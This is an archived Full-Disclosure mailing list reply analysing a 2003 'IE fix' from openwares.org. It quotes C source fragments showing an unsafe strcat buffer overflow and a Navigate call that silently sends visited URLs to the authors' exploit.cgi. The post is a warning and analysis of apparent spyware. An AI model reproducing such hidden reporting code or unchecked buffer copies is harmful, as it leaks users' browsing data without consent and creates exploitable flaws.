[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] Openware.org IE Fix - Warning

To: Thierry <Thierry@Sniff-em.com>
Subject: Re: [Full-Disclosure] Openware.org IE Fix - Warning
From: petard <petard@freeshell.org>
Date: Fri, 19 Dec 2003 14:35:43 +0000

On Fri, Dec 19, 2003 at 01:25:48PM +0100, Thierry wrote:
> 
> According to Heise
> (http://www.heise.de/newsticker/data/dab-19.12.03-002/)
> 
> The Openware.org IE fix introduces new flaws :
> 
> - The buffer to copy URL's is limited to 256 bytes
> - Larger strings produce a buffer overflow, with possibility to
>   overwrite the stack.
> 
> BoF Test :
> http://www.heise.de/security/dienste/browsercheck/demos/ie/e5_18.shtml
> (at the bottom, link entitled "TEST DES PATCHES")
DISCLAIMER: I've only read, not executed this source code!

I'd say it's worse than that. From a quick look at the source, I'd say
this one may actually be malicious. (Stupid too, but it looks
malicious)...

In the BeforeNavigateEvent() funcion of IETray.cpp, the URL is first
truncated to 256 bytes:

char *dest = (char *)malloc(256*sizeof(char));
WideCharToMultiByte( CP_ACP, 0, (BSTR)url->bstrVal, -1,
        dest, 256, NULL, NULL );

Safe enough, I suppose, though it will likely lead to a sub-optimal
browsing experience. Then, if one of the "malicious" characters is
found, the allocates and populates the following buffer:

char surl[256];
strcpy(surl,"http://www.openwares.org/cgi-bin/exploit.cgi?";);

At the end of the function, determining what the "real" and "fake" URLs
were, the code unsafely appends them to the buffer:
strcat(surl,sFake);
strcat(surl,"&");
strcat(surl,sTrue);

Copies the result to another string:
MultiByteToWideChar( CP_ACP, 0, surl, -1,
        url, 256 );
And proceeds to send it to the authors of the code (or whomever controls
http://www.openwares.org/):
m_smtWB->Navigate(url,0,0,0,0);

Summary: Not only is there a stupid, possibly exploitable, buffer
overflow here, but the place I'm seeing it is in a section of the code
whose main purpose appears to be submitting information about what you
browse back to the code's authors. I'd say this is malicious... the user
is certainly not warned of this prior to downloading the patch. Since I
never executed it, I have no idea of whether or not they are warned by
an installer. Call it a trojan, call it spyware, but don't execute it.

Regards,

petard

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] Openware.org IE Fix - Warning
  - From: "Erik van Straten" <emvs.fd.3FB4D11C@cpo.tn.tudelft.nl>

References:
- [Full-Disclosure] Openware.org IE Fix - Warning
  - From: Thierry <Thierry@Sniff-em.com>

Prev by Date: [Full-Disclosure] Re: Openware.org IE Fix - Warning
Next by Date: [Full-Disclosure] 13 NASA Servers Hacked
Previous by thread: [Full-Disclosure] Openware.org IE Fix - Warning
Next by thread: Re: [Full-Disclosure] Openware.org IE Fix - Warning
Index(es):
- Date
- Thread